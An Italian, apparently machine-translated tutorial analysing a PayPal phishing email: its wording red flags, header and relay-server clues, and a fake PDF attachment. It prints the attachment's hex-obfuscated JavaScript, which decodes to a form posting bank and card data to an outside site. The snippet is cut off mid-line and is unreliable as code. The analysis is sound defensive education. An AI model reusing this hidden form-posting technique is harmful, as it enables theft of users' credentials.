Sicurezza online che spezza l'anatomia di una email di phishing
Nel mondo di oggi in cui le informazioni di tutti sono online, il phishing è uno degli attacchi online più popolari e devastanti, perché puoi sempre pulire un virus, ma se i tuoi dati bancari vengono rubati, sei nei guai. Ecco una ripartizione di uno di questi attacchi che abbiamo ricevuto.
Non pensare che siano solo i tuoi dettagli bancari che sono importanti: dopo tutto, se qualcuno ottiene il controllo sul tuo account, non solo conosce le informazioni contenute in quell'account, ma le probabilità sono che le stesse informazioni di accesso possano essere usate su vari altri conti. E se compromettono il tuo account di posta elettronica, possono ripristinare tutte le altre password.
Quindi, oltre a mantenere password forti e variabili, devi essere sempre alla ricerca di e-mail fasulle mascherate da elementi reali. Mentre la maggior parte dei tentativi di phishing sono amatoriali, alcuni sono abbastanza convincenti, quindi è importante capire come riconoscerli a livello di superficie e come funzionano sotto la cappa.
Immagine di asirap
Esaminando ciò che è in Plain Sight
La nostra email di esempio, come la maggior parte dei tentativi di phishing, "notifica" l'utente sul proprio account PayPal che, in circostanze normali, sarebbe allarmante. Quindi la call to action è di verificare / ripristinare il tuo account inviando quasi tutte le informazioni personali che puoi immaginare. Di nuovo, questo è abbastanza formidabile.
Mentre ci sono certamente delle eccezioni, praticamente tutte le e-mail di phishing e truffa sono caricate con le bandiere rosse direttamente nel messaggio stesso. Anche se il testo è convincente, di solito puoi trovare molti errori disseminati nel corpo del messaggio che indicano che il messaggio non è legittimo.
Il corpo del messaggio
A prima vista, questa è una delle migliori email di phishing che ho visto. Non ci sono errori di ortografia o grammaticali e la verbosità si legge in base a ciò che potresti aspettarti. Tuttavia, ci sono alcune bandiere rosse che puoi vedere quando esamini il contenuto un po 'più da vicino.
- "Paypal" - Il caso corretto è "PayPal" (maiuscola P). Puoi vedere che entrambe le varianti sono usate nel messaggio. Le aziende sono molto intenzionate con il loro marchio, quindi è dubbio che qualcosa del genere supererebbe il processo di correzione.
- "Consenti ActiveX" - Quante volte hai visto un business basato sul Web legittimo, le dimensioni di Paypal utilizzano un componente proprietario che funziona solo su un singolo browser, specialmente quando supportano più browser? Certo, da qualche parte c'è un'azienda che lo fa, ma questa è una bandiera rossa.
- "Sicuro". - Notare come questa parola non si allinea al margine con il resto del testo del paragrafo. Anche se allungo un po 'di più la finestra, non si avvolge o spazio correttamente.
- "Paypal!" - Lo spazio prima del punto esclamativo sembra imbarazzante. Solo un'altra stranezza che sono sicuro non sarebbe in una email legittima.
- "PayPal- Account Update Form.pdf.htm" - Perché Paypal dovrebbe allegare un "PDF" soprattutto quando potevano semplicemente collegarsi a una pagina sul loro sito? Inoltre, perché dovrebbero cercare di mascherare un file HTML come PDF? Questa è la più grande bandiera rossa di tutti loro.
L'intestazione del messaggio
Quando dai un'occhiata all'intestazione del messaggio, compaiono un paio di altre bandiere rosse:
- L'indirizzo è [email protected].
- Manca l'indirizzo. Non l'ho escluso, semplicemente non fa parte dell'intestazione del messaggio standard. In genere un'azienda che ha il tuo nome personalizzerà l'email per te.
L'allegato
Quando apro l'allegato, è possibile vedere immediatamente che il layout non è corretto in quanto manca le informazioni sullo stile. Ancora una volta, perché PayPal dovrebbe inviare via email un modulo HTML quando potrebbe semplicemente darti un link sul loro sito?
Nota: per questo abbiamo utilizzato il visualizzatore di allegati HTML incorporato di Gmail, ma ti consigliamo di NON APRIRE gli allegati da scammer. Mai. Mai. Molto spesso contengono exploit che installano trojan sul tuo PC per rubare le informazioni del tuo account.
Scorrendo un po 'di più puoi vedere che questo modulo chiede non solo i nostri dati di accesso PayPal, ma anche informazioni bancarie e della carta di credito. Alcune delle immagini sono rotte.
È ovvio che questo tentativo di phishing procuri tutto con un colpo solo.
La rottura tecnica
Mentre dovrebbe essere abbastanza chiaro in base a ciò che è in bella vista che si tratta di un tentativo di phishing, ora stiamo andando a rompere il trucco tecnico della mail e vedere cosa possiamo trovare.
Informazioni dall'Allegato
La prima cosa da dare un'occhiata è la fonte HTML del modulo allegato che è ciò che invia i dati al sito fasullo.
Quando visualizzi rapidamente la fonte, tutti i link appaiono validi in quanto puntano a "paypal.com" o "paypalobjects.com" che sono entrambi legittimi.
Ora daremo un'occhiata ad alcune informazioni di base sulla pagina che Firefox raccoglie sulla pagina.
Come puoi vedere, alcuni elementi grafici vengono estratti dai domini "blessedtobe.com", "goodhealthpharmacy.com" e "pic-upload.de" invece dei domini PayPal legittimi..
Informazioni dalle intestazioni dell'email
Di seguito daremo un'occhiata alle intestazioni dei messaggi di posta elettronica non elaborati. Gmail lo rende disponibile tramite l'opzione di menu Mostra originale sul messaggio.
Guardando le informazioni di intestazione per il messaggio originale, è possibile vedere questo messaggio è stato composto utilizzando Outlook Express 6. Dubito che PayPal abbia qualcuno sullo staff che invia ciascuno di questi messaggi manualmente tramite un client di posta elettronica obsoleto.
Ora guardando le informazioni di routing, possiamo vedere l'indirizzo IP sia del mittente che del relay mail server.
L'indirizzo IP "Utente" è il mittente originale. Facendo una rapida ricerca sulle informazioni IP, possiamo vedere che l'IP di invio è in Germania.
E quando guardiamo il server di inoltro della posta (mail.itak.at), l'indirizzo IP possiamo vedere che questo è un ISP con sede in Austria. Dubito che PayPal instradi le loro e-mail direttamente attraverso un ISP con sede in Austria quando hanno una massiccia server farm che potrebbe facilmente gestire questa attività.
Dove vanno i dati?
Abbiamo quindi chiaramente stabilito che si tratta di un'email di phishing e abbiamo raccolto alcune informazioni su dove ha avuto origine il messaggio, ma su dove sono stati inviati i tuoi dati?
Per vedere questo, dobbiamo prima salvare l'allegato HTM sul desktop e aprirlo in un editor di testo. Scorrendolo, tutto sembra essere in ordine salvo quando arriviamo a un blocco Javascript che sembra sospetto.
Scoprendo la fonte completa dell'ultimo blocco di Javascript, vediamo:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”, per (i = 0; i
Ogni volta che vedi una grande stringa confusa di lettere e numeri apparentemente casuali incorporati in un blocco Javascript, di solito è qualcosa di sospetto. Guardando il codice, la variabile "x" è impostata su questa stringa grande e quindi decodificata nella variabile "y". Il risultato finale della variabile "y" viene quindi scritto nel documento come HTML.
Poiché la stringa grande è composta da numeri 0-9 e le lettere a-f, è molto probabilmente codificata tramite una semplice conversione da ASCII a Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Traduce in:
Non è una coincidenza che questo decodifica in un tag form HTML valido che invia i risultati non a PayPal, ma a un sito canaglia.
Inoltre, quando visualizzi l'origine HTML del modulo, vedrai che questo tag non è visibile perché è generato dinamicamente tramite Javascript. Questo è un modo intelligente per nascondere ciò che l'HTML sta effettivamente facendo se qualcuno dovesse semplicemente visualizzare la sorgente generata dell'allegato (come abbiamo fatto in precedenza) anziché aprire l'allegato direttamente in un editor di testo.
Eseguendo un rapido whois sul sito incriminato, possiamo vedere che questo è un dominio ospitato in un popolare web host, 1 e 1.
Ciò che emerge è che il dominio utilizza un nome leggibile (al contrario di qualcosa come "dfh3sjhskjhw.net") e il dominio è stato registrato per 4 anni. Per questo motivo, credo che questo dominio sia stato dirottato e utilizzato come pedina in questo tentativo di phishing.
Il cinismo è una buona difesa
Quando si tratta di stare al sicuro online, non fa mai male avere un po 'di cinismo.
Mentre sono sicuro che ci sono più bandiere rosse nell'e-mail di esempio, ciò che abbiamo sottolineato sopra sono indicatori che abbiamo visto dopo pochi minuti di esame. Ipoteticamente, se il livello di superficie dell'email imitasse la sua controparte legittima al 100%, l'analisi tecnica rivelerebbe ancora la sua vera natura. Questo è il motivo per cui è importante poter esaminare sia ciò che puoi e ciò che non puoi vedere.